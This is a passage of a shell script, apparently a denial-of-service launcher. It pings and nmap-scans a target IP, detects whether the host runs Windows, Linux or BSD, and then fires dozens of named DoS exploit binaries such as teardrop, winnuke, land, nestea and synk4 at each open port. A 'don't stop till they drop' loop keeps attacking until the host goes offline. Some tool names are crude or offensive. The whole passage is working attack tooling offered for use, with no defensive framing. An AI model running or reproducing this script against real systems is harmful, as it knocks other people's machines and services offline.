 ./bin/flushot $SRCIP $DESTIP `expr 100 "*" $LINESPEED` 1>/dev/null 2>/dev/null
LASTATTACK="flushot"
 pingtest
}
function NoPorts {
kox
pimp
pimp2
moyari13
fawx
laser
oshare
gin
dosfrontpage
jaypee
udpflood
onetwothreefour
opentear
doslinux
ascendfoo
beer
biffit
bloop
bonk
coke
conseal
echok
foqerc
galt_gin
gewse
gewse5
jolt
overdrop
pirchslap
pong
rc8
spiffit
stuffit
ssping
synful
targa
targa2
targa3
trash
trash2
twinge
winfreez
winnuke
flushot
}
function FullAttack {
 koc
 kod
 kox
 moyari13
 arnup100
 galt_gin
 pirchslap
 twinge
 inetddos
 dosfrontpage
 onetwothreefour
 doslinux
 ascendfoo
 beer
 biffit
 boink
 bonk
 bloop
 hestra
 gin
 oshare
 coke
 conseal
 echok
 fawx
 foqerc
 gewse
 gewse5
 jaypee
 jolt
 kkill
 killwin
 land
 latierra
 misfrag
 mutilate
 nestea
 nestea2
 newtear
 teardrop
 overdrop
 orgasm
 pepsi
 pimp
 pimp2
 pong
 rape
 rcon
 rc8
 spiffit
 ssping
 stuffit
 syndrop
 synful
 synhose
 synk
 synk4
 trash
 trash2
 udpdata
 udpflood
 winfreez
 wingatecrash
 winnuke
 killwin
 flushot
 opentear
 comatose
 hell
 laser
 linuxicmp
 slice3
 sprite
 stealth
 ton
 cocksuck
 ruc
 duy
 raped
 stream
 targa
 targa2
 targa3
} 

function LinuxAttack {
 trash
 trash2
 syndrop
 synful
 synhose
 synk
 synk4
 spiffit
 biffit
 galt_gin
 twinge
 arnup100
 gewse
 gewse5
 gin
 inetddos
 echok
 doslinux
 overdrop
 nestea 
 nestea2
 orgasm
 newtear
 teardrop
 foqerc 
 pong
 rc8
 stuffit
 coke
 ascendfoo
 beer
 pepsi
 udpdata
 udpflood
 hestra
 hell
 laser
 linuxicmp
 slice3
 sprite
 stealth
 ton
 cocksuck
 ruc
 duy
 opentear
 stream
 raped
 targa
 targa2
 targa3 
}

function BSDAttack {
 overdrop
 newtear
 teardrop
 land
 latierra
 echok
 biffit
 spiffit
 coke
 beer
 udpdata
 udpflood
 hestra
 gin
 twinge
 arnup100
 trash
 trash2
 pepsi  
 rc8
 stuffit
 pong
 syndrop 
 opentear
 hell
 laser
 slice3
 sprite
 stealth
 ton
 cocksuck
 ruc
 duy
 raped
 stream
 synful
 synhose
 synk
 synk4
 targa
 targa2
 targa3
}

function WinAttack {
 koc
 kod
 kox
 moyari13
 bloop
 twinge
 galt_gin
 arnup100
 dosfrontpage
 pirchslap
 pimp
 pimp2
 jaypee
 winfreez
 winnuke 
 killwin
 rape
 orgasm
 trash
 trash2
 conseal
 hestra
 gin
 oshare
 overdrop
 jolt   
 boink
 bonk
 echok
 newtear
 teardrop
 land
 latierra
 conseal
 misfrag
 nestea
 nestea2
 syndrop
 synful
 synhose
 synk
 synk4
 rcon
 coke
 pepsi
 pong
 rc8
 stuffit
 ssping
 udpdata
 udpflood
 onetwothreefour
 wingatecrash
 flushot
 opentear
 comatose
 hell
 laser
 slice3
 sprite
 stealth
 ton
 cocksuck
 ruc
 duy
 raped
 stream
 targa
 targa2
 targa3
}
COUNTER1=1
echo "Options:"
echo "Destination IP: $DESTIP"
	if [ -n "$LOGFILE" ]; then
	    echo "Destination IP: $DESTIP" >> ./$LOGFILE
	fi   
echo "Source IP: $SRCIP"
	if [ -n "$LOGFILE" ]; then
	    echo "Source IP: $SRCIP" >> ./$LOGFILE
	fi   
echo "Port Range: $PORTLIST"
	if [ -n "$LOGFILE" ]; then
	    echo "Port Range: $PORTLIST" >> ./$LOGFILE
	fi   
if [ -z "$LOGFILE" ]; then
echo "Logging: OFF"
else
echo "Logging: ON to file ./$LOGFILE"
fi
if [ "$SCANONLY" = "1" ]; then
echo "Scan Only: ON"
else
echo "Scan Only: OFF"
fi
case "$LINESPEED" in
1)
echo "Line Speed: Modem" ;;
2)
echo "Line Speed: T1" ;;
4)
echo "Line Speed: T3" ;;
esac
if [ "$DONTSTOP" = "1" ]; then
echo "\"Don't stop till they drop\": ON"
else
echo "\"Don't stop till they drop\": OFF"
fi
if [ "$WATCHCON" = "1" ]; then
echo "Wait for online host: ON"
else
echo "Wait for online host: OFF"
fi
if [ "$WATCHCON" = "0" ]; then
echo "Checking to see if $DESTIP is alive ..."
        ping=`ping -c3 $DESTIP | grep 100%`
	        
if [ "$ping" = "3 packets transmitted, 0 packets received, 100% packet loss" ]; then
        echo "Host is unavailable, exiting..."
	if [ -n "$LOGFILE" ]; then
	echo "-----------------------------"
	fi
	exit 2
else
        echo "Host is alive, starting portscan..."
fi
else
echo "Watching connection..."
HOSTFOUND=0
while [ "$HOSTFOUND" = "0" ]; do
    ping=`ping -c2 $DESTIP | grep 100%`
	        
if [ "$ping" = "2 packets transmitted, 0 packets received, 100% packet loss" ]; then
printf "."
else
        echo "Host is alive, starting portscan..."
	if [ -n "$LOGFILE" ]; then
	    echo "$DESTIP" >> ./$LOGFILE
	fi
HOSTFOUND=1
fi
sleep 5
done
fi
case "$LINESPEED" in
1)
${NMAPDIR} -P0 -O -p $PORTLIST $DESTIP 1> ./output.txt 2> ./output.txt ;;
2)
${NMAPDIR} -P0 -T Aggressive -O -p $PORTLIST $DESTIP 1> ./output.txt 2> ./output.txt ;;
4)
${NMAPDIR} -P0 -T Insane -O -p $PORTLIST $DESTIP 1> ./output.txt 2> ./output.txt ;;
esac
OS=`cat ./output.txt | grep "Remote operating system"`
cat ./output.txt| grep open -w | grep tcp -w > ./output.txt
cat ./output.txt | cut -b24- > ./svcname.txt
cat ./output.txt | cut -d/ -f1 > ./output2.txt
cat ./output2.txt > ./output.txt
rm -rf ./output2.txt
OUTPUT=`cat ./output.txt -n | grep 1 -w | cut -b8-`
if [ "$OUTPUT" = "" ]; then
if [ -n "$LOGFILE" ]; then
echo "No Ports" >> ./$LOGFILE
fi
    
echo "No ports found."

if [ -f ./svcname.txt ]; then
rm -rf ./svcname.txt
fi
if [ -f ./output2.txt ]; then
rm -rf ./output2.txt
fi

while true ; do

    if [ "$DONTSTOP" = "1" ]; then
    DONTSTOPPER
    fi

if [ "$COUNTER1" = "43" ]; then
    echo "Attack Complete!"
    echo "Checking to see if $DESTIP is still alive ..."
        ping=`ping -c3 $DESTIP | grep 100%`
	        
if [ "$ping" = "3 packets transmitted, 0 packets received, 100% packet loss" ]; then
        echo "Host was dropped by $LASTATTACK."
	if [ -n "$LOGFILE" ]; then
	echo "Dropped by $LASTATTACK." >> ./$LOGFILE
	echo "-----------------------------"
	fi
	exit 0
else
        echo "He's still alive=\ You might wanna try again..."
	if [ -n "$LOGFILE" ]; then
	echo "-----------------------------"
	fi
	exit 5
fi
    else 
    echo "Attacking $DESTIP"
NoPorts
fi    
    	
COUNTER1=`expr $COUNTER1 + 1`
done     	 

fi
    OSCHECK=`echo "$OS" | grep "Windows"`
    if [ "$OSCHECK" = "" ]; then
	OSCHECK=`echo "$OS" | grep Linux`
	if [ "$OSCHECK" = "" ]; then
	OSCHECK=`echo "$OS" | grep BSD`
	    if [ "$OSCHECK" = "" ]; then
		OS="All"
	    else
		OS="BSD"
	    fi
	else
	OS="Linux"
	fi
    else
    OS="Windows 9x"
    fi
if [ -n "$LOGFILE" ]; then
echo "$OS" >> ./$LOGFILE
fi
i=1
while read LINE
do
cat ./svcname.txt -n | grep $i -w | cut -b8- > ./output3.txt
TESTING=`cat ./output3.txt | wc -l | cut -b7-`
if [ "$TESTING" != "1" ]; then
x=1
while read LINE3
do
if [ "$x" = "1" ]; then
LINE2="$LINE3"
fi
x=`expr $x + 1`
done < "./output3.txt"
else
LINE2=`cat ./output3.txt`
fi
rm ./output3.txt
echo "$LINE/$LINE2" >> ./output2.txt
i=`expr $i + 1`
done < "./output.txt"
cat ./output2.txt > ./output.txt
rm -rf ./output2.txt
rm -rf ./svcname.txt

NUMPORTS=`cat ./output.txt | wc -l | cut -b-8`
OUTPUTLIST=`cat ./output.txt`
if [ -n "$LOGFILE" ]; then
echo "Open ports:" >> ./$LOGFILE
echo "$OUTPUTLIST" >> ./$LOGFILE
fi
case $OS in
    "Linux")
    echo "Linux host detected..."
    ;;
    "Windows 9x")
    echo "Windows 9x/NT/2000 host detected..."
    ;;
    "BSD")
    echo "BSD host detected..."
    ;;
    "All")
    echo "OS could not be detected. Running all attacks..."
    ;;
esac    
NUMPORTS=`echo $NUMPORTS `
echo "$NUMPORTS TCP port(s) were found open:"
echo "$OUTPUTLIST"
if [ "$SCANONLY" = "1" ]; then
echo "Scan of $DESTIP complete."
if [ -n "$LOGFILE" ]; then
echo "-----------------------------"
fi
exit 4
fi

while true ; do

    OUTPUT=`cat ./output.txt -n | grep $COUNTER1 -w | cut -b8- | cut -d/ -f1`
    if [ "$OUTPUT" = "" ]; then
    if [ "$DONTSTOP" = "1" ]; then
    DONTSTOPPER
    fi
    fi

    if [ "$OUTPUT" = "" ]; then
    echo "Attack Complete!"
    echo "Checking to see if $DESTIP is still alive ..."
        ping=`ping -c3 $DESTIP | grep 100%`
	        
if [ "$ping" = "3 packets transmitted, 0 packets received, 100% packet loss" ]; then
        echo "Host was dropped by $LASTATTACK."
	if [ -n "$LOGFILE" ]; then
	echo "Dropped by $LASTATTACK." >> ./$LOGFILE
	echo "-----------------------------"
	fi
	exit 0
else
        echo "He's still alive=\ You might wanna try again..."
	if [ -n "$LOGFILE" ]; then
	echo "-----------------------------"
	fi
	exit 5
fi
    else 
    echo "Attacking $DESTIP on port: $OUTPUT"
    case $OS in
    "Linux")
    LinuxAttack
    ;;
    "Windows 9x")
    WinAttack
    ;;
    "BSD")
    BSDAttack
    ;;
    "All")
    FullAttack
    ;;
esac    
fi    
    	
COUNTER1=`expr $COUNTER1 + 1`
done     	 
    
